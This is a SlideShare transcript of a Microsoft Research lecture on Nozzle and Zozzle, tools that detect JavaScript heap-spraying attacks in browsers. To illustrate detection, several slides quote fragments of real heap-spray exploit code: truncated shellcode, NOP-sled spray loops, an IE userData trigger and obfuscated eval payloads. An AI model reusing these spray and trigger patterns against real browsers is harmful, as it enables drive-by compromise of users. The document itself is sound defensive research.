20101017 program analysis_for_security_livshits_lecture04_nozzle

713 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
713
On SlideShare
0
From Embeds
0
Number of Embeds
53
Actions
Shares
0
Downloads
13
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

20101017 program analysis_for_security_livshits_lecture04_nozzle

  1. 1. Finding Malware on a Web Scale Ben Livshits Microsoft Research Redmond, WA
  2. 2. Stack-based buffer overruns 1995 Heap-based buffer overruns 2002 Heap sprays 2005 Brief History of Memory-Based Exploits 2
  3. 3. Heap Spraying http://www.web2secure.com/2009/07/mozilla-firefox-35-heap-spray.html Firefox 3.5 July 14, 2009 3
  4. 4. <html> <body> <button id=’butid’ onclick=’trigger();’ style=’display:none’/> <script> // Shellcode var shellcode=unescape(‘%u9090%u9090%u9090%u9090%uceba%u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u563 bigblock=unescape(‚%u0D0D%u0D0D‛); headersize=20;shellcodesize=headersize+shellcode.length; while(bigblock.length<shellcodesize){bigblock+=bigblock;} heapshell=bigblock.substring(0,shellcodesize); nopsled=bigblock.substring(0,bigblock.length-shellcodesize); while(nopsled.length+shellcodesize<0 25000){nopsled=nopsled+nopsled+heapshell} // Spray var spray=new Array(); for(i=0;i<500;i++){spray[i]=nopsled+shellcode;} // Trigger function trigger(){ var varbdy = document.createElement(‘body’); varbdy.addBehavior(‘#default#userData’); document.appendChild(varbdy); try { for (iter=0; iter<10; iter++) { varbdy.setAttribute(‘s’,window); } } catch(e){ } window.status+=‛; } document.getElementById(‘butid’).onclick(); </script> </body> </html> 4
  5. 5. Historical Digression 5
  6. 6. Research to Reality in 15 Short Months От идеи до продукта May 2009 – October 2010 6
  7. 7. Heap Sprays • Targets web users through the browser • Focus on prevention • Wanted it to run in the browser May 2009 8
  8. 8. Challenges • False positives • False negatives • Performance overhead June 2009 9
  9. 9. August -- March 2009 Nozzle • Combination of runtime and static analysis • Low false positives • Low false negatives • 5-15% overhead • Paper in UsenixSec ‘09 10
  10. 10. 5-15% is too high April 2009 • Browser landscape is very competitive performance-wise 11
  11. 11. Offline Scanning • Help from Bing • Finds malware on the January 2010 web • Can scan a large number of URLs 12
  12. 12. October 2010 13
  13. 13. End of Historical Digression 14
  14. 14. Drive-By Heap Spraying 0wned! 15
  15. 15. Drive-By Heap Spraying (2) ASLR prevents the Program Heap attack ok bad PC Creates the ok malicious object <HTML> <SCRIPT language="text/javascript"> Triggers the jump shellcode = unescape("%u4343%u4343%...''); </SCRIPT> <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB … NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC … ഍഍"> </IFRAME> </HTML> 16
  16. 16. Drive-By Heap Spraying (3) Program Heap ok bad bad bad bad bad ok bad <SCRIPT language="text/javascript"> shellcode = unescape("%u4343%u4343%...''); oneblock = unescape("%u0C0C%u0C0C"); Allocate 1,000s of var fullblock = oneblock; while (fullblock.length<0x40000) { malicious objects fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<1000; i++) { sprayContainer[i] = fullblock + shellcode; } </SCRIPT> 17
  17. 17. Nozzle: Runtime Heap Spraying Detection Normalized attack surface (NAS) good bad 18
  18. 18. Local Malicious Object Detection Is this object dangerous? Code or Data? 000000000000 add [eax], al • Is this object code? 000000000000 add [eax], al – Code and data look the same on x86 000000000000 add [eax], al 000000000000 NOP add [eax], al • Focus on sled detection 000000000000 add [eax], al 000000000000 add [eax], al – Majority of object is sled 000000000000 sled add [eax], al – Spraying scripts build simple sleds • Is this code a NOP sled? 0101010101 and ah, [edx] – Previous techniques do not look at heap 0101010101 and ah, [edx] 0101010101 and ah, [edx] – Many heap objects look like NOP sleds 0101010101 and ah, [edx] – 80% false positive rates using previous 0101010101 shellcode and ah, [edx] 0101010101 and ah, [edx] techniques 0101010101 and ah, [edx] • Need stronger local techniques 19
  19. 19. Object Surface Area Calculation (1) • Assume: attacker wants to reach shell code from jump to any point in object • Goal: find blocks that are likely to be reached via control flow • Strategy: use dataflow analysis to compute “surface area” of each block An example object from visiting google.com 20
  20. 20. Object Surface Area Calculation (2) 4 4 12 • Each block starts with its own size as weight • Weights are propagated forward with flow 2 6 12 • Invalid blocks don’t propagate 4 10 12 39 15 • Iterate until a fixpoint is reached 2 12 12 • Compute block with highest weight 2 14 14 An example object from visiting google.com 21
  21. 21. Nozzle Global Heap Metric Normalize to (approx): P(jump will cause exploit) NSA(H) obj build CFG Legend: sub [eax], eax arithmatic adc dh, bh memory or eax, 0d172004h SA(H) Bi I/O or syscall in eax, 0x11 control flow test cl, ah jecxz 021c7fd8 Compute threat add [eax], al add [ecx], 0 add al, 30h add al, 80h outs dx, [esi] add al, 38h of entire heap jecxz 021c7fde xor [eax], eax To target block imul eax, [eax], 6ch dataflow or eax, 0d179004h SA(o) SA(Bi) Compute threat of Compute threat of single block single object 22
  22. 22. Nozzle Experimental Summary 0 False Positives • 10 popular AJAX-heavy sites • 150 top Web sites 0 False Negatives • 12 published heap spraying exploits and • 2,000 synthetic rogue pages generated using Metasploit Runtime Overhead • As high as 2x without sampling • 5-10% with sampling 23
  23. 23. Nozzle Runtime Overhead 24
  24. 24. 10% overhead 25
  25. 25. What do we do with all this data? 26
  26. 26. Obfuscation eval(""+O(2369522)+O(1949494)+O eval(l(79)+l(61)+l(102)+l(117)+ OlOlll="(x)"; var l = function(x) { (2288625)+O(648464)+O(2304124)+ l(110)+l(99)+l(116)+l(105)+l(11 OllOlO=" String"; return String.fromCharCode(x); O(2080995)+O(2020710)+O(2164958 1)+l(110)+l(40)+l(109)+l(41)+l( OlllOO="tion"; } )+O(2168902)+O(1986377)+O(22279 123)+l(114)+l(101)+l(116)+l(117 OlOllO="Code(x)}"; 03)+O(2005851)+O(2021303)+O(646 )+l(114)+l(110)+l(32)+l(83)+l(1 var O = function(m){ OllOOO="Char"; return String.fromCharCode( 435)+O(1228455)+O(644519)+O(234 16)+l(114)+l(105)+l(110)+l(103) OlllOl="func"; Math.floor(m / 10000) / 2); 6826)+O(2207788)+O(2023127)+O(2 +l(46)+l(102)+l(114)+l(111)+l(1 } OllllO=" l = "; 306806)+O(1983560)+O(1949296)+O 09)+l(67)+l(104)+l(97)+l(114)+l OllOOl=".from"; (2245968)+O(2028685)+O(809214)+ (67)+l(111)+l(100)+l(101)+l(40) shellcode = unescape("%u54EB%u758B…"); OllOll="{return"; O(680960)+O(747602)+O(2346412)+ +l(77)+l(97)+l(116)+l(104)+l(46 var bigblock = unescape("%u0c0c%u0c0c"); Olllll="var"; O(1060647)+O(1045327)+O(1381007 )+l(102)+l(108)+l(111)+l(111)+l while(bigblock.length<slackspace) { eval(Olllll+OllllO+OlllOl+OlllO )+O(1329180)+O(745897)+O(234140 (114)+l(40)+l(109)+l(47)+l(49)+ bigblock += bigblock; O+OlOlll+OllOll+OllOlO+OllOOl+O 4)+O(1109791)+O(1064283)+O(1128 l(48)+l(48)+l(48)+l(48)+l(41)+l } llOOO+OlOllO); block = bigblock.substring(0, 719)+O(1321055)+O(748985)+...); (47)+l(50)+l(41)+l(59)+l(125)); bigblock.length-slackspace); while(block.length+slackspace<0x40000) { block = block + block + fillblock; } memory = new Array(); for(x=0; x<300; x++) { memory[x] = block + shellcode; 27 …
  27. 27. Drive By Detection • Nozzle Visit a page and let it run • • for new processesZozzle WatchObserve the page as it runs • Handle infection a heapcode before it runs • Watch for the spray • Examine – Detect•inWhen suspect code is found • Kill the script before the a VM – Run vulnerability is triggered antivirus – Terminate the page OR – Enable other detection var she var spray for(i=0; mechanisms memory[ document. 28
  28. 28. Detection Techniques Drive By Detection Nozzle Zozzle Certainty Performance Timeliness of Detection Hit Rate 29
  29. 29. 10% 15% 20% 25% 30% 35% 0% 5% MAL003 29.7% MAL004 29.7% Unique Exploits Discovered MAL036 9.7% 0 2 4 6 8 12 14 16 18 10 0 MAL033 7.7% MAL035 3.9% MAL032 3.2% 20 MAL039 2.6% MAL001 1.9% 40 MAL006 1.9% MAL031 1.9% 60 MAL034 1.9% MAL011 1.3% MAL037 1.3% 80 MAL040 1.3% Most attacks look like this Malicious URLs Examined MAL005 0.6% 100 MAL009 0.6% MAL038 0.6% 120 We don’t find many new attacks Can We Detect Attacks Statically? 140 30
  30. 30. shellcode = unescape("%u54EB%u758B…"); Deobfuscation var bigblock = unescape("%u0c0c%u0c0c"); while(bigblock.length<slackspace) { bigblock += bigblock; Hierarchical Feature Extraction } block = bigblock.substring(0, bigblock.length-slackspace); Naïve Bayes Classification eval(""+O(2369522)+O(19494 while(block.length+slackspace<0x40000) { } block = block + block + fillblock; 94)+O(2288625)+O(648464)+O (2304124)+O(2080995)+O(202 memory = function new Array(); 0710)+O(2164958)+O(2168902 Feature )+O(1986377)+O(2227903)+O( P(malicious) 2005851)+O(2021303)+O(6464 35)+O(1228455)+O(644519)+O string:0c0c (2346826)+O(2207788)+O(202 0.99 Deobfuscator 3127)+O(2306806)+O(1983560 = function:shellcode )+O(1949296)+O(2245968)+O( 0.99 loop 2028685)+O(809214)+O(68096 function:shellcode JavaScript loop:memory 0)+O(747602)+O(2346412)+O( 0.87 Runtime 1060647)+O(1045327)+O(1381 007)+O(1329180)+O(745897)+ abcabcabcabcabc O(2341404)+O(1109791)+O(10 0.80 64283)+O(1128719)+O(132105 = shellcode string loop:memory try:activex 5)+O(748985)+...); 0.41 string:%u0c0c%u0909… * P(malicious) loop:block if:msie 7 0.33 abcabcabcabcabcabc 0.21 %u0c0c%u0909… memory block function:unescape 0.45 abcabcabcabcabcabc 0.55 loop:nop 0.95 31
  31. 31. The Zozzle Ecosystem Server Side (Microsoft) Browser Side Classifier Classifier Classifier Classifier 32
  32. 32. Feature Selection False Positives False Negatives 25% 25% 20% 20% Classifier False Negative Rate Classifier False Positive Rate 15% 15% 10% 10% 5% 5% 0% 0% 0% 5% 10% 15% 0% 5% 10% 15% Training Set Size Training Set Size Hand-Picked Automatic Hand-Picked Automatic 33
  33. 33. Comparison of Detection Methods 34
  34. 34. shellcode = unescape("%u9090%u9090%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9…"); var memory = []; var spraySize = "548864" - shellcode.length * "2"; var nop = unescape("%u0c0c%u0c0c"); while (nop.length < spraySize / "2") { nop += nop; } var nops = nop.substring("0", spraySize / "2"); Zozzle can automatically delete nop; for(i = "0"; i < "270"; i++) { identify components of an } memory[i] = nops + nops + shellcode; function payload() attack. { var body = document.createElement("BODY"); body.addBehavior("#default#userData"); document.appendChild(body); try { for(i = "0"; i < "10"; i++) { body.setAttribute("s", window); } } catch(e) { Shellcode } window.status += ""; } Spray document.getElementById("bo").onclick(); Vulnerability 35
  35. 35. Summary Heap spraying attacks are • Easy to implement, easy to retarget • In widespread use Nozzle • Effectively detects published attacks (known and new) • Has acceptable runtime overhead • Can be used both online and offline Zozzle is a static detection solution • Fast and scalable • Accurate and powerful 36

×